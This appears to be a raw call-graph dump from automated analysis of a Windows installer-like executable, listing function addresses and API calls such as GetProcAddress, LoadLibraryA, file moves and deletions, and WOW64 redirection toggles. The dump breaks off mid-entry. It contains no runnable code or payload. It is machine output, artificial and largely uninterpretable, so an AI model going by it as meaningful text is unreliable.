403344 54071->54129 54073 498bb6 54132 4056a0 54073->54132 54075 498bbb 54135 40631c GetModuleHandleA GetProcAddress 54075->54135 54079 498bc5 54143 40994c 54079->54143 54410 4032fc 54129->54410 54131 403349 GetModuleHandleA GetCommandLineA 54131->54073 54134 4056db 54132->54134 54411 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54132->54411 54134->54075 54136 406338 54135->54136 54137 40633f GetProcAddress 54135->54137 54136->54137 54138 406355 GetProcAddress 54137->54138 54139 40634e 54137->54139 54140 406364 SetProcessDEPPolicy 54138->54140 54141 406368 54138->54141 54139->54138 54140->54141 54142 4063c4 6FB81CD0 54141->54142 54142->54079 54412 409024 54143->54412 54410->54131 54411->54134 54413 408cbc 19 API calls 54412->54413 54414 409035 54413->54414 54415 4085dc GetSystemDefaultLCID 54414->54415 54418 408612 54415->54418 54416 406dec 19 API calls 54416->54418 54417 408568 19 API calls 54417->54418 54418->54416 54418->54417 54419 403450 18 API calls 54418->54419 54423 408674 54418->54423 54419->54418 54420 406dec 19 API calls 54420->54423 54421 408568 19 API calls 54421->54423 54422 403450 18 API calls 54422->54423 54423->54420 54423->54421 54423->54422 54424 4086f7 54423->54424 54425 403420 4 API calls 54424->54425 54426 408711 54425->54426 54427 408720 GetSystemDefaultLCID 54426->54427 54484 408568 GetLocaleInfoA 54427->54484 54430 403450 18 API calls 54431 408760 54430->54431 54432 408568 19 API calls 54431->54432 54433 408775 54432->54433 54434 408568 19 API calls 54433->54434 54435 408799 54434->54435 54490 4085b4 GetLocaleInfoA 54435->54490 54438 4085b4 GetLocaleInfoA 54439 4087c9 54438->54439 54440 408568 19 API calls 54439->54440 54441 4087e3 54440->54441 54442 4085b4 GetLocaleInfoA 54441->54442 54443 408800 54442->54443 54485 4085a1 54484->54485 54486 40858f 54484->54486 54488 403494 4 API calls 54485->54488 54487 4034e0 18 API calls 54486->54487 54489 40859f 54487->54489 54488->54489 54489->54430 54491 4085d0 54490->54491 54491->54438 55845 42f520 55846 42f52b 55845->55846 55847 42f52f NtdllDefWindowProc_A 55845->55847 55847->55846 50281 416b42 50282 416bea 50281->50282 50283 416b5a 50281->50283 50300 41531c 18 API calls 50282->50300 50285 416b74 SendMessageA 50283->50285 50286 416b68 50283->50286 50296 416bc8 50285->50296 50287 416b72 CallWindowProcA 50286->50287 50288 416b8e 50286->50288 50287->50296 50297 41a058 GetSysColor 50288->50297 50291 416b99 SetTextColor 50292 416bae 50291->50292 50298 41a058 GetSysColor 50292->50298 50294 416bb3 SetBkColor 50299 41a6e0 GetSysColor CreateBrushIndirect 50294->50299 50297->50291 50298->50294 50299->50296 50300->50296 55848 4358e0 55849 4358f5 55848->55849 55852 43590f 55849->55852 55854 4352c8 55849->55854 55861 435312 55854->55861 55864 4352f8 55854->55864 55855 403400 4 API calls 55856 435717 55855->55856 55856->55852 55867 435728 18 API calls 55856->55867 55857 446da4 18 API calls 55857->55864 55858 403744 18 API calls 55858->55864 55859 403450 18 API calls 55859->55864 55860 402648 18 API calls 55860->55864 55861->55855 55863 431ca0 18 API calls 55863->55864 55864->55857 55864->55858 55864->55859 55864->55860 55864->55861 55864->55863 55865 4038a4 18 API calls 55864->55865 55868 4343b0 55864->55868 55880 434b74 18 API calls 55864->55880 55865->55864 55867->55852 55869 43446d 55868->55869 55870 4343dd 55868->55870 55899 434310 18 API calls 55869->55899 55871 403494 4 API calls 55870->55871 55873 4343eb 55871->55873 55875 403778 18 API calls 55873->55875 55874 43445f 55876 403400 4 API calls 55874->55876 55878 43440c 55875->55878 55877 4344bd 55876->55877 55877->55864 55878->55874 55881 494944 55878->55881 55880->55864 55882 49497c 55881->55882 55883 494a14 55881->55883 55885 403494 4 API calls 55882->55885 55900 448930 55883->55900 55888 494987 55885->55888 55886 494997 55887 403400 4 API calls 55886->55887 55889 494a38 55887->55889 55888->55886 55890 4037b8 18 API calls 55888->55890 55891 403400 4 API calls 55889->55891 55893 4949b0 55890->55893 55892 494a40 55891->55892 55892->55878 55893->55886 55894 4037b8 18 API calls 55893->55894 55895 4949d3 55894->55895 55896 403778 18 API calls 55895->55896 55897 494a04 55896->55897 55898 403634 18 API calls 55897->55898 55898->55883 55899->55874 55901 448955 55900->55901 55902 448998 55900->55902 55903 403494 4 API calls 55901->55903 55905 4489ac 55902->55905 55912 44852c 55902->55912 55904 448960 55903->55904 55909 4037b8 18 API calls 55904->55909 55907 403400 4 API calls 55905->55907 55908 4489df 55907->55908 55908->55886 55910 44897c 55909->55910 55911 4037b8 18 API calls 55910->55911 55911->55902 55913 403494 4 API calls 55912->55913 55914 448562 55913->55914 55915 4037b8 18 API calls 55914->55915 55916 448574 55915->55916 55917 403778 18 API calls 55916->55917 55918 448595 55917->55918 55919 4037b8 18 API calls 55918->55919 55920 4485ad 55919->55920 55921 403778 18 API calls 55920->55921 55922 4485d8 55921->55922 55923 4037b8 18 API calls 55922->55923 55933 4485f0 55923->55933 55924 448628 55926 403420 4 API calls 55924->55926 55925 4486c3 55929 4486cb GetProcAddress 55925->55929 55930 448708 55926->55930 55927 44864b LoadLibraryExA 55927->55933 55928 44865d LoadLibraryA 55928->55933 55931 4486de 55929->55931 55930->55905 55931->55924 55932 403b80 18 API calls 55932->55933 55933->55924 55933->55925 55933->55927 55933->55928 55933->55932 55934 403450 18 API calls 55933->55934 55936 43da88 18 API calls 55933->55936 55934->55933 55936->55933 50301 416644 50302 416651 50301->50302 50303 4166ab 50301->50303 50308 416550 CreateWindowExA 50302->50308 50304 416658 SetPropA SetPropA 50304->50303 50305 41668b 50304->50305 50306 41669e SetWindowPos 50305->50306 50306->50303 50308->50304 55937 4222e4 55938 4222f3 55937->55938 55943 421274 55938->55943 55941 422313 55944 4212e3 55943->55944 55946 421283 55943->55946 55948 4212f4 55944->55948 55968 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55944->55968 55946->55944 55967 408d2c 33 API calls 55946->55967 55947 421322 55954 421395 55947->55954 55958 42133d 55947->55958 55948->55947 55949 4213ba 55948->55949 55951 4213ce SetMenu 55949->55951 55964 421393 55949->55964 55950 4213e6 55971 4211bc 24 API calls 55950->55971 55951->55964 55956 4213a9 55954->55956 55954->55964 55955 4213ed 55955->55941 55966 4221e8 10 API calls 55955->55966 55959 4213b2 SetMenu 55956->55959 55960 421360 GetMenu 55958->55960 55958->55964 55959->55964 55961 421383 55960->55961 55962 42136a 55960->55962 55969 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55961->55969 55965 42137d SetMenu 55962->55965 55964->55950 55970 421e2c 25 API calls 55964->55970 55965->55961 55966->55941 55967->55946 55968->55948 55969->55964 55970->55950 55971->55955 55972 44b4a8 55973 44b4b6 55972->55973 55975 44b4d5 55972->55975 55974 44b38c 25 API calls 55973->55974 55973->55975 55974->55975 55976 448728 55977 448756 55976->55977 55978 44875d 55976->55978 55981 403400 4 API calls 55977->55981 55979 448771 55978->55979 55982 44852c 21 API calls 55978->55982 55979->55977 55980 403494 4 API calls 55979->55980 55983 44878a 55980->55983 55984 448907 55981->55984 55982->55979 55985 4037b8 18 API calls 55983->55985 55986 4487a6 55985->55986 55987 4037b8 18 API calls 55986->55987 55988 4487c2 55987->55988 55988->55977 55989 4487d6 55988->55989 55990 4037b8 18 API calls 55989->55990 55991 4487f0 55990->55991 55992 431bd0 18 API calls 55991->55992 55993 448812 55992->55993 55994 448832 55993->55994 55995 431ca0 18 API calls 55993->55995 55996 448870 55994->55996 56019 4435d0 18 API calls 55994->56019 55995->55993 55997 448888 55996->55997 56020 4435d0 18 API calls 55996->56020 56008 442334 55997->56008 56000 4488bc GetLastError 56021 4484c0 18 API calls 56000->56021 56003 4488cb 56022 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56003->56022 56005 4488e0 56023 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56005->56023 56007 4488e8 56009 443312 56008->56009 56010 44236d 56008->56010 56012 403400 4 API calls 56009->56012 56011 403400 4 API calls 56010->56011 56013 442375 56011->56013 56014 443327 56012->56014 56015 431bd0 18 API calls 56013->56015 56014->56000 56016 442381 56015->56016 56017 443302 56016->56017 56024 441a0c 18 API calls 56016->56024 56017->56000 56019->55994 56020->55997 56021->56003 56022->56005 56023->56007 56024->56016 56025 4165ec DestroyWindow 56026 42e3ef SetErrorMode 50309 441394 50310 44139d 50309->50310 50311 4413ab WriteFile 50309->50311 50310->50311 50312 4413b6 50311->50312 50313 416410 50314 416422 50313->50314 50315 416462 GetClassInfoA 50314->50315 50333 408d2c 33 API calls 50314->50333 50316 41648e 50315->50316 50318 4164e9 50316->50318 50319 4164b0 RegisterClassA 50316->50319 50320 4164a0 UnregisterClassA 50316->50320 50324 416506 50318->50324 50327 416517 50318->50327 50319->50318 50322 4164d8 50319->50322 50320->50319 50321 41645d 50321->50315 50334 408cbc 50322->50334 50324->50318 50325 408cbc 19 API calls 50324->50325 50325->50327 50342 407544 50327->50342 50330 416530 50347 41a1e8 50330->50347 50332 41653a 50333->50321 50335 408cc8 50334->50335 50355 406dec LoadStringA 50335->50355 50340 403400 4 API calls 50341 408d0e 50340->50341 50341->50318 50343 407552 50342->50343 50344 407548 50342->50344 50346 418384 7 API calls 50343->50346 50345 402660 4 API calls 50344->50345 50345->50343 50346->50330 50348 41a213 50347->50348 50349 41a2af 50347->50349 50364 403520 50348->50364 50350 403400 4 API calls 50349->50350 50351 41a2c7 50350->50351 50351->50332 50353 41a26b 50354 41a2a3 CreateFontIndirectA 50353->50354 50354->50349 50356 4034e0 18 API calls 50355->50356 50357 406e19 50356->50357 50358 403450 50357->50358 50359 403454 50358->50359 50360 403464 50358->50360 50359->50360 50362 4034bc 18 API calls 50359->50362 50361 403490 50360->50361 50363 402660 4 API calls 50360->50363 50361->50340 50362->50360 50363->50361 50365 4034e0 18 API calls 50364->50365 50366 40352a 50365->50366 50366->50353 56027 491bf8 56028 491c32 56027->56028 56029 491c3e 56028->56029 56030 491c34 56028->56030 56032 491c4d 56029->56032 56033 491c76 56029->56033 56223 409098 MessageBeep 56030->56223 56035 446ff8 32 API calls 56032->56035 56040 491cae 56033->56040 56041 491c85 56033->56041 56034 403420 4 API calls 56036 49228a 56034->56036 56037 491c5a 56035->56037 56038 403400 4 API calls 56036->56038 56224 406bb0 56037->56224 56042 492292 56038->56042 56047 491cbd 56040->56047 56048 491ce6 56040->56048 56044 446ff8 32 API calls 56041->56044 56046 491c92 56044->56046 56232 406c00 18 API calls 56046->56232 56050 446ff8 32 API calls 56047->56050 56055 491d0e 56048->56055 56056 491cf5 56048->56056 56053 491cca 56050->56053 56051 491c9d 56233 44734c 19 API calls 56051->56233 56234 406c34 18 API calls 56053->56234 56062 491d1d 56055->56062 56063 491d42 56055->56063 56236 407280 19 API calls 56056->56236 56058 491cd5 56235 44734c 19 API calls 56058->56235 56059 491cfd 56237 44734c 19 API calls 56059->56237 56064 446ff8 32 API calls 56062->56064 56066 491d7a 56063->56066 56067 491d51 56063->56067 56065 491d2a 56064->56065 56068 4072a8 SetCurrentDirectoryA 56065->56068 56074 491d89 56066->56074 56075 491db2 56066->56075 56069 446ff8 32 API calls 56067->56069 56070 491d32 56068->56070 56071 491d5e 56069->56071 56238 4470d0 19 API calls 56070->56238 56073 42c804 19 API calls 56071->56073 56076 491d69 56073->56076 56077 446ff8 32 API calls 56074->56077 56080 491dfe 56075->56080 56081 491dc1 56075->56081 56239 44734c 19 API calls 56076->56239 56079 491d96 56077->56079 56240 4071f8 22 API calls 56079->56240 56087 491e0d 56080->56087 56088 491e36 56080->56088 56083 446ff8 32 API calls 56081->56083 56086 491dd0 56083->56086 56084 491da1 56241 44734c 19 API calls 56084->56241 56089 446ff8 32 API calls 56086->56089 56090 446ff8 32 API calls 56087->56090 56095 491e6e 56088->56095 56096 491e45 56088->56096 56091 491de1 56089->56091 56092 491e1a 56090->56092 56242 4918fc 22 API calls 56091->56242 56094 42c8a4 19 API calls 56092->56094 56098 491e25 56094->56098 56103 491e7d 56095->56103 56104 491ea6 56095->56104 56099 446ff8 32 API calls 56096->56099 56097 491ded 56243 44734c 19 API calls 56097->56243 56244 44734c 19 API calls 56098->56244 56102 491e52 56099->56102 56105 42c8cc 19 API calls 56102->56105 56106 446ff8 32 API calls 56103->56106 56111 491ede 56104->56111 56112 491eb5 56104->56112 56107 491e5d 56105->56107 56109 491e8a 56106->56109 56245 44734c 19 API calls 56107->56245 56246 42c8fc 19 API calls 56109->56246 56118 491eed 56111->56118 56119 491f16 56111->56119 56113 446ff8 32 API calls 56112->56113 56115 491ec2 56113->56115 56114 491e95 56247 44734c 19 API calls 56114->56247 56117 42c92c 19 API calls 56115->56117 56120 491ecd 56117->56120 56121 446ff8 32 API calls 56118->56121 56124 491f62 56119->56124 56125 491f25 56119->56125 56248 44734c 19 API calls 56120->56248 56123 491efa 56121->56123 56126 42c954 19 API calls 56123->56126 56132 491f71 56124->56132 56133 491fb4 56124->56133 56127 446ff8 32 API calls 56125->56127 56128 491f05 56126->56128 56129 491f34 56127->56129 56249 44734c 19 API calls 56128->56249 56131 446ff8 32 API calls 56129->56131 56135 491f45 56131->56135 56134 446ff8 32 API calls 56132->56134 56140 491fc3 56133->56140 56141 492027 56133->56141 56136 491f84 56134->56136 56250 42c4f8 19 API calls 56135->56250 56138 446ff8 32 API calls 56136->56138 56142 491f95 56138->56142 56139 491f51 56251 44734c 19 API calls 56139->56251 56144 446ff8 32 API calls 56140->56144 56148 492066 56141->56148 56149 492036 56141->56149 56252 491af4 26 API calls 56142->56252 56146 491fd0 56144->56146 56215 42c608 21 API calls 56146->56215 56147 491fa3 56253 44734c 19 API calls 56147->56253 56159 4920a5 56148->56159 56160 492075 56148->56160 56152 446ff8 32 API calls 56149->56152 56156 492043 56152->56156 56153 491fde 56154 491fe2 56153->56154 56155 492017 56153->56155 56158 446ff8 32 API calls 56154->56158 56255 4470d0 19 API calls 56155->56255 56256 452908 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 56156->56256 56163 491ff1 56158->56163 56168 4920e4 56159->56168 56169 4920b4 56159->56169 56164 446ff8 32 API calls 56160->56164 56162 492050 56257 4470d0 19 API calls 56162->56257 56216 452c80 56163->56216 56167 492082 56164->56167 56172 452770 5 API calls 56167->56172 56179 49212c 56168->56179 56180 4920f3 56168->56180 56173 446ff8 32 API calls 56169->56173 56170 492061 56196 491c39 56170->56196 56171 492001 56254 4470d0 19 API calls 56171->56254 56175 49208f 56172->56175 56176 4920c1 56173->56176 56258 4470d0 19 API calls 56175->56258 56259 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56176->56259 56185 49213b 56179->56185 56186 492174 56179->56186 56182 446ff8 32 API calls 56180->56182 56181 4920ce 56260 4470d0 19 API calls 56181->56260 56184 492102 56182->56184 56187 446ff8 32 API calls 56184->56187 56188 446ff8 32 API calls 56185->56188 56191 492187 56186->56191 56198 49223d 56186->56198 56189 492113 56187->56189 56190 49214a 56188->56190 56193 447278 19 API calls 56189->56193 56192 446ff8 32 API calls 56190->56192 56194 446ff8 32 API calls 56191->56194 56195 49215b 56192->56195 56193->56196 56197 4921b4 56194->56197 56202 447278 19 API calls 56195->56202 56196->56034 56199 446ff8 32 API calls 56197->56199 56198->56196 56264 446f9c 32 API calls 56198->56264 56200 4921cb 56199->56200 56261 407ddc 21 API calls 56200->56261 56202->56196 56203 492256 56204 42e8c8 19 API calls 56203->56204 56205 49225e 56204->56205 56265 44734c 19 API calls 56205->56265 56208 4921ed 56209 446ff8 32 API calls 56208->56209 56210 492201 56209->56210 56262 408508 18 API calls 56210->56262 56212 49220c 56263 44734c 19 API calls 56212->56263 56214 492218 56215->56153 56217 452724 2 API calls 56216->56217 56219 452c99 56217->56219 56218 452c9d 56218->56171 56219->56218 56220 452cc1 MoveFileA GetLastError 56219->56220 56221 452760 Wow64RevertWow64FsRedirection 56220->56221 56222 452ce7 56221->56222 56222->56171 56223->56196 56225 406bbf 56224->56225 56226 406bd8 56225->56226 56228 406be1 56225->56228 56227 403400 4 API calls 56226->56227 56229 406bdf 56227->56229 56230 403778 18 API calls 56228->56230 56231 44734c 19 API calls 56229->56231 56230->56229 56231->56196 56232->56051 56233->56196 56234->56058 56235->56196 56236->56059 56237->56196 56238->56196 56239->56196 56240->56084 56241->56196 56242->56097 56243->56196 56244->56196 56245->56196 56246->56114 56247->56196 56248->56196 56249->56196 56250->56139 56251->56196 56252->56147 56253->56196 56254->56196 56255->56196 56256->56162 56257->56170 56258->56196 56259->56181 56260->56196 56261->56208 56262->56212 56263->56214 56264->56203 56265->56196 56266 40cc34 56269 406f10 WriteFile 56266->56269 56270 406f2d 56269->56270 50367 48095d 50372 451004 50367->50372 50369 480971 50382 47fa0c 50369->50382 50371 480995 50373 451011 50372->50373 50375 451065 50373->50375 50391 408c0c 18 API calls 50373->50391 50388 450e88 50375->50388 50379 45108d 50380 4510d0 50379->50380 50393 408c0c 18 API calls 50379->50393 50380->50369 50398 40b3c8 50382->50398 50384 47fa79 50384->50371 50387 47fa2e 50387->50384 50402 4069dc 50387->50402 50405 476994 50387->50405 50394 450e34 50388->50394 50391->50375 50392 408c0c 18 API calls 50392->50379 50393->50380 50395 450e46 50394->50395 50396 450e57 50394->50396 50397 450e4b InterlockedExchange 50395->50397 50396->50379 50396->50392 50397->50396 50399 40b3d3 50398->50399 50400 40b3f3 50399->50400 50421 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50399->50421 50400->50387 50403 402648 18 API calls 50402->50403 50404 4069e7 50403->50404 50404->50387 50416 4769c5 50405->50416 50419 476a0e 50405->50419 50406 476a59 50422 451294 50406->50422 50408 476a70 50410 403420 4 API calls 50408->50410 50412 476a8a 50410->50412 50411 4038a4 18 API calls 50411->50419 50412->50387 50414 403450 18 API calls 50414->50416 50415 403450 18 API calls 50415->50419 50416->50414 50418 451294 35 API calls 50416->50418 50416->50419 50428 4038a4 50416->50428 50437 403744 50416->50437 50417 403744 18 API calls 50417->50419 50418->50416 50419->50406 50419->50411 50419->50415 50419->50417 50420 451294 35 API calls 50419->50420 50420->50419 50421->50400 50423 4512af 50422->50423 50427 4512a4 50422->50427 50441 451238 35 API calls 50423->50441 50425 4512ba 50425->50427 50442 408c0c 18 API calls 50425->50442 50427->50408 50430 4038b1 50428->50430 50436 4038e1 50428->50436 50429 403400 4 API calls 50432 4038cb 50429->50432 50431 4038da 50430->50431 50433 4038bd 50430->50433 50434 4034bc 18 API calls 50431->50434 50432->50416 50443 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50433->50443 50434->50436 50436->50429 50438 40374a 50437->50438 50440 40375b 50437->50440 50439 4034bc 18 API calls 50438->50439 50438->50440 50439->50440 50440->50416 50441->50425 50442->50427 50443->50432 50444 41ee54 50445 41ee63 IsWindowVisible 50444->50445 50446 41ee99 50444->50446 50445->50446 50447 41ee6d IsWindowEnabled 50445->50447 50447->50446 50448 41ee77 50447->50448 50449 402648 18 API calls 50448->50449 50450 41ee81 EnableWindow 50449->50450 50450->50446 50451 46bb10 50452 46bb44 50451->50452 50483 46bfad 50451->50483 50456 46bbdc 50452->50456 50457 46bbba 50452->50457 50458 46bbcb 50452->50458 50459 46bb98 50452->50459 50460 46bba9 50452->50460 50469 46bb80 50452->50469 50453 403400 4 API calls 50455 46bfec 50453->50455 50464 403400 4 API calls 50455->50464 50774 46baa0 59 API calls 50456->50774 50507 46b6d0 50457->50507 50773 46b890 81 API calls 50458->50773 50771 46b420 61 API calls 50459->50771 50772 46b588 56 API calls 50460->50772 50468 46bff4 50464->50468 50467 46bb9e 50467->50469 50467->50483 50469->50483 50542 468c74 50469->50542 50470 46bc18 50470->50483 50486 46bc5b 50470->50486 50775 494da0 50470->50775 50473 46bd7e 50794 48358c 137 API calls 50473->50794 50474 414ae8 18 API calls 50474->50486 50477 46bd99 50477->50483 50478 42cbc0 20 API calls 50478->50486 50479 46af68 37 API calls 50479->50486 50481 403450 18 API calls 50481->50486 50483->50453 50484 46bdd7 50560 469f1c 50484->50560 50485 46af68 37 API calls 50485->50483 50486->50473 50486->50474 50486->50478 50486->50479 50486->50481 50486->50483 50486->50484 50503 46be9f 50486->50503 50545 468bb0 50486->50545 50553 46acd4 50486->50553 50698 483084 50486->50698 50811 46b1dc 33 API calls 50486->50811 50488 46be3d 50489 403450 18 API calls 50488->50489 50490 46be4d 50489->50490 50491 46bea9 50490->50491 50492 46be59 50490->50492 50497 46bf6b 50491->50497 50621 46af68 50491->50621 50795 457f1c 50492->50795 50496 457f1c 38 API calls 50496->50503 50503->50485 50812 46c424 50507->50812 50510 46b852 50512 403420 4 API calls 50510->50512 50514 46b86c 50512->50514 50513 46b71e 50515 46b83e 50513->50515 50819 455f84 27 API calls 50513->50819 50516 403400 4 API calls 50514->50516 50515->50510 50518 403450 18 API calls 50515->50518 50519 46b874 50516->50519 50518->50510 50520 403400 4 API calls 50519->50520 50521 46b87c 50520->50521 50521->50469 50522 46b801 50522->50510 50522->50515 50527 42cd48 21 API calls 50522->50527 50524 46b7a1 50524->50510 50524->50522 50829 42cd48 50524->50829 50526 46b73c 50526->50524 50820 466600 50526->50820 50529 46b817 50527->50529 50529->50515 50534 451458 18 API calls 50529->50534 50533 466600 33 API calls 50537 46b82e 50534->50537 50836 47efd0 56 API calls 50537->50836 50543 468bb0 33 API calls 50542->50543 50544 468c83 50543->50544 50544->50470 50546 468bdf 50545->50546 50547 4078f4 33 API calls 50546->50547 50550 468c20 50546->50550 50548 468c18 50547->50548 51089 453344 18 API calls 50548->51089 50551 403400 4 API calls 50550->50551 50552 468c38 50551->50552 50552->50486 50554 46ace5 50553->50554 50555 46ace0 50553->50555 51175 469a80 60 API calls 50554->51175 50557 46ace3 50555->50557 51090 46a740 50555->51090 50557->50486 50558 46aced 50558->50486 50561 403400 4 API calls 50560->50561 50562 469f4a 50561->50562 51552 47dd00 50562->51552 50564 469fad 50565 469fb1 50564->50565 50566 469fca 50564->50566 51559 466800 50565->51559 50568 469fbb 50566->50568 51562 494c90 18 API calls 50566->51562 50570 46a25e 50568->50570 50573 46a154 50568->50573 50574 46a0e9 50568->50574 50571 403420 4 API calls 50570->50571 50576 46a288 50571->50576 50572 469fe6 50572->50568 50577 469fee 50572->50577 50575 403494 4 API calls 50573->50575 50578 403494 4 API calls 50574->50578 50580 46a161 50575->50580 50576->50488 50581 46af68 37 API calls 50577->50581 50579 46a0f6 50578->50579 50582 40357c 18 API calls 50579->50582 50583 40357c 18 API calls 50580->50583 50590 469ffb 50581->50590 50584 46a103 50582->50584 50585 46a16e 50583->50585 50586 40357c 18 API calls 50584->50586 50587 40357c 18 API calls 50585->50587 50588 46a110 50586->50588 50589 46a17b 50587->50589 50591 40357c 18 API calls 50588->50591 50592 40357c 18 API calls 50589->50592 50595 46a024 SetActiveWindow 50590->50595 50596 46a03c 50590->50596 50593 46a11d 50591->50593 50594 46a188 50592->50594 50597 466800 34 API calls 50593->50597 50598 40357c 18 API calls 50594->50598 50595->50596 51563 42f560 50596->51563 50599 46a12b 50597->50599 50600 46a196 50598->50600 50602 40357c 18 API calls 50599->50602 50603 414b18 18 API calls 50600->50603 50605 46a134 50602->50605 50606 46a152 50603->50606 50608 40357c 18 API calls 50605->50608 51580 466b38 50606->51580 50611 46a141 50608->50611 50610 46a08d 50613 46ade4 35 API calls 50610->50613 50612 414b18 18 API calls 50611->50612 50612->50606 50614 46a0bf 50613->50614 50614->50488 50622 468c74 33 API calls 50621->50622 50623 46af80 50622->50623 50624 46afa2 50623->50624 50625 4652cc 21 API calls 50623->50625 51765 4652cc 50624->51765 50625->50624 50629 46afba 50630 46ade4 35 API calls 50629->50630 50631 46aff2 50630->50631 50632 414b18 18 API calls 50631->50632 50633 46b006 50632->50633 50634 46b012 50633->50634 50635 46b03c 50633->50635 50636 414b18 18 API calls 50634->50636 50638 46b05b 50635->50638 50639 46b085 50635->50639 50637 46b026 50636->50637 50640 414b18 18 API calls 50637->50640 50641 414b18 18 API calls 50638->50641 50642 414b18 18 API calls 50639->50642 50644 46b03a 50640->50644 50645 46b06f 50641->50645 50643 46b099 50642->50643 50646 414b18 18 API calls 50643->50646 50647 414b18 18 API calls 50645->50647 50646->50644 50647->50644 50699 46c424 62 API calls 50698->50699 50700 4830c7 50699->50700 50701 4830d0 50700->50701 52041 408be0 19 API calls 50700->52041 50703 414ae8 18 API calls 50701->50703 50704 4830e0 50703->50704 50705 403450 18 API calls 50704->50705 50706 4830ed 50705->50706 51843 46c77c 50706->51843 50709 4830fd 50711 414ae8 18 API calls 50709->50711 50712 48310d 50711->50712 50713 403450 18 API calls 50712->50713 50714 48311a 50713->50714 50715 469868 SendMessageA 50714->50715 50716 483133 50715->50716 50717 483184 50716->50717 52043 479e18 37 API calls 50716->52043 51872 4241dc IsIconic 50717->51872 50721 48319f SetActiveWindow 50722 4831b4 50721->50722 51880 4824b4 50722->51880 50771->50467 50772->50469 50773->50469 50774->50469 53704 43d9c8 50775->53704 50778 494dcc 53709 431bd0 50778->53709 50779 494e52 50780 494e61 50779->50780 53742 4945c8 18 API calls 50779->53742 50780->50486 50789 494e16 53740 49465c 18 API calls 50789->53740 50791 494e2a 53741 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50791->53741 50793 494e4a 50793->50486 50794->50477 50796 457f41 50795->50796 50797 457f61 50796->50797 50798 4078f4 33 API calls 50796->50798 50799 403400 4 API calls 50797->50799 50800 457f59 50798->50800 50801 457f76 50799->50801 50802 457d10 38 API calls 50800->50802 50801->50496 50802->50797 50811->50486 50837 46c4bc 50812->50837 50815 414ae8 50816 414af6 50815->50816 50817 4034e0 18 API calls 50816->50817 50818 414b03 50817->50818 50818->50513 50819->50526 50821 46661a 50820->50821 51040 4078f4 50821->51040 51083 42cccc 50829->51083 50832 451458 50833 451428 18 API calls 50832->50833 50834 451474 50833->50834 50835 47efd0 56 API calls 50834->50835 50835->50522 50836->50515 50838 414ae8 18 API calls 50837->50838 50839 46c4f0 50838->50839 50898 466898 50839->50898 50843 46c502 50844 46c511 50843->50844 50847 46c52a 50843->50847 50967 47efd0 56 API calls 50844->50967 50846 403420 4 API calls 50849 46b702 50846->50849 50848 46c571 50847->50848 50850 46c558 50847->50850 50851 46c5d6 50848->50851 50856 46c575 50848->50856 50849->50510 50849->50815 50968 47efd0 56 API calls 50850->50968 50970 42cb4c CharNextA 50851->50970 50854 46c5e5 50855 46c5e9 50854->50855 50860 46c602 50854->50860 50971 47efd0 56 API calls 50855->50971 50858 46c5bd 50856->50858 50856->50860 50969 47efd0 56 API calls 50858->50969 50859 46c626 50972 47efd0 56 API calls 50859->50972 50860->50859 50912 466a08 50860->50912 50865 46c525 50865->50846 50868 46c63f 50920 403778 50868->50920 50873 46c666 50973 466a94 18 API calls 50873->50973 50874 46c697 50931 42c8cc 50874->50931 50877 46c679 50879 451458 18 API calls 50877->50879 50881 46c686 50879->50881 50974 47efd0 56 API calls 50881->50974 50903 4668b2 50898->50903 50899 406bb0 18 API calls 50899->50903 50901 42cbc0 20 API calls 50901->50903 50902 403450 18 API calls 50902->50903 50903->50899 50903->50901 50903->50902 50904 4668fb 50903->50904 50977 42caac 50903->50977 50905 403420 4 API calls 50904->50905 50906 466915 50905->50906 50907 414b18 50906->50907 50908 414ae8 18 API calls 50907->50908 50909 414b3c 50908->50909 50910 403400 4 API calls 50909->50910 50911 414b6d 50910->50911 50911->50843 50913 466a12 50912->50913 50914 466a25 50913->50914 50993 42cb3c CharNextA 50913->50993 50914->50859 50916 466a38 50914->50916 50917 466a42 50916->50917 50918 466a6f 50917->50918 50994 42cb3c CharNextA 50917->50994 50918->50859 50918->50868 50921 4037aa 50920->50921 50922 40377d 50920->50922 50923 403400 4 API calls 50921->50923 50922->50921 50924 403791 50922->50924 50926 4037a0 50923->50926 50925 4034e0 18 API calls 50924->50925 50925->50926 50927 42c99c 50926->50927 50928 42c9b2 50927->50928 50929 42c9f5 50927->50929 50928->50929 50995 42cb3c CharNextA 50928->50995 50929->50873 50929->50874 50996 42c674 50931->50996 50967->50865 50968->50865 50969->50865 50970->50854 50971->50865 50972->50865 50973->50877 50974->50865 50978 403494 4 API calls 50977->50978 50979 42cabc 50978->50979 50980 403744 18 API calls 50979->50980 50984 42caf2 50979->50984 50986 42c444 IsDBCSLeadByte 50979->50986 50980->50979 50982 42cb36 50982->50903 50984->50982 50987 4037b8 50984->50987 50992 42c444 IsDBCSLeadByte 50984->50992 50986->50979 50988 403744 18 API calls 50987->50988 50990 4037c6 50988->50990 50989 4037fc 50989->50984 50990->50989 50991 4038a4 18 API calls 50990->50991 50991->50989 50992->50984 50993->50913 50994->50917 50995->50928 50999 42c67c 50996->50999 51002 42c68d 50999->51002 51000 42c6f1 51003 42c6ec 51000->51003 51007 42c444 IsDBCSLeadByte 51000->51007 51002->51000 51005 42c6ab 51002->51005 51005->51003 51006 42c444 IsDBCSLeadByte 51005->51006 51006->51005 51007->51003 51043 407908 51040->51043 51044 407925 51043->51044 51051 4075b8 51044->51051 51047 407951 51049 4034e0 18 API calls 51047->51049 51050 407903 51049->51050 51050->50533 51054 4075d3 51051->51054 51052 4075e5 51052->51047 51056 4069a0 19 API calls 51052->51056 51054->51052 51057 4076da 33 API calls 51054->51057 51058 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51054->51058 51056->51047 51057->51054 51058->51054 51084 42cbc0 20 API calls 51083->51084 51085 42ccee 51084->51085 51086 42ccf6 GetFileAttributesA 51085->51086 51087 403400 4 API calls 51086->51087 51088 42cd13 51087->51088 51088->50522 51088->50832 51089->50550 51092 46a787 51090->51092 51091 46abff 51094 46ac1a 51091->51094 51095 